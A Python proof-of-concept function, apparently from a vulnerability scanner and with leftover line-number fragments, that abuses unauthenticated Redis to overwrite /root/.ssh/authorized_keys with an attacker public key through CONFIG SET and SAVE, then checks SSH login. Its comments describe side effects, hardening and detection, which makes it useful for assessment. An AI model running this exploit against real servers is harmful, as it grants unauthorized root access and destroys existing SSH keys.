(url)
| 27 | |
| 28 | |
def poc(url):
    """Check whether a Redis server reachable without credentials can be used
    to write root's SSH ``authorized_keys`` file.

    Args:
        url: Target as ``host`` or ``host:port``; the port defaults to 6379
            when no ``:`` is present. The value is first passed through
            ``host2IP`` (defined elsewhere; presumably resolves a hostname
            to an IP address -- confirm).

    Returns:
        True only when every Redis step succeeds and ``testConnect(ip, 22)``
        reports success. False in every other case, including any exception.

    Side effects:
        This check is not read-only. Where it succeeds, the server is left
        with ``/root/.ssh/authorized_keys`` replaced by a Redis dump that
        contains ``public_key``, with ``dbfilename`` still set to
        ``authorized_keys`` and with ``dir`` set to ``/tmp``. Nothing in this
        function restores the previous file or the previous configuration
        values.

    Exposure this finding indicates, and the usual hardening:
        * Redis accepts commands without authentication -- set
          ``requirepass`` or use ACLs, and keep ``protected-mode`` on.
        * Redis is reachable from the scanner's network -- ``bind`` it to a
          trusted interface and firewall the port.
        * The Redis process can write under ``/root`` -- run it as an
          unprivileged service account.
        * ``CONFIG SET`` is available to clients -- restrict it with ACLs or
          ``rename-command``.
        For detection, ``CONFIG SET`` calls that change ``dir`` or
        ``dbfilename`` and unexpected modification of
        ``/root/.ssh/authorized_keys`` are the events to alert on.
    """
    url = host2IP(url)
    ip = url.split(':')[0]
    # Use the explicit port when the target string carries one, else Redis' default.
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        # Skip hosts where port 22 is not reachable: the final verification
        # step below depends on it. checkPortTcp is defined elsewhere.
        if not checkPortTcp(ip, 22):
            return False
        # No password is supplied, so everything below only works against a
        # server that accepts unauthenticated clients.
        r = redis.Redis(host=ip, port=port, db=0)
        # A successful INFO reply containing 'redis_version' is taken as proof
        # that the peer is Redis and answered without credentials.
        if 'redis_version' in r.info():
            # Temporary key with a random 10-character name (randomString is
            # defined elsewhere); the value is public_key wrapped in blank lines.
            key = randomString(10)
            r.set(key, '\n\n' + public_key + '\n\n')
            # Point the dump location at root's SSH directory and file name,
            # then force a synchronous dump. An existing authorized_keys file
            # at that path is overwritten by the dump.
            r.config_set('dir', '/root/.ssh')
            r.config_set('dbfilename', 'authorized_keys')
            r.save()
            # Remove the temporary key from the keyspace (original comment:
            # "clear traces"). The file already written by save() is unaffected.
            r.delete(key)
            # NOTE(review): 'dir' is set to /tmp rather than to its previous
            # value, and 'dbfilename' is left as 'authorized_keys'; the
            # server's later dumps will therefore go to /tmp/authorized_keys.
            r.config_set('dir', '/tmp')
            # Fixed pause before verification -- presumably to let the write
            # take effect; confirm whether it is needed after a blocking save().
            time.sleep(5)
            # testConnect is defined later in this file; presumably it attempts
            # an SSH login with the matching private key -- confirm.
            if testConnect(ip, 22):
                return True
    except Exception:
        # Any failure (connection refused, authentication required, CONFIG
        # rejected, ...) is reported as "not vulnerable" without logging.
        return False
    return False
| 51 | |
| 52 | |
| 53 | def testConnect(ip, port=22): |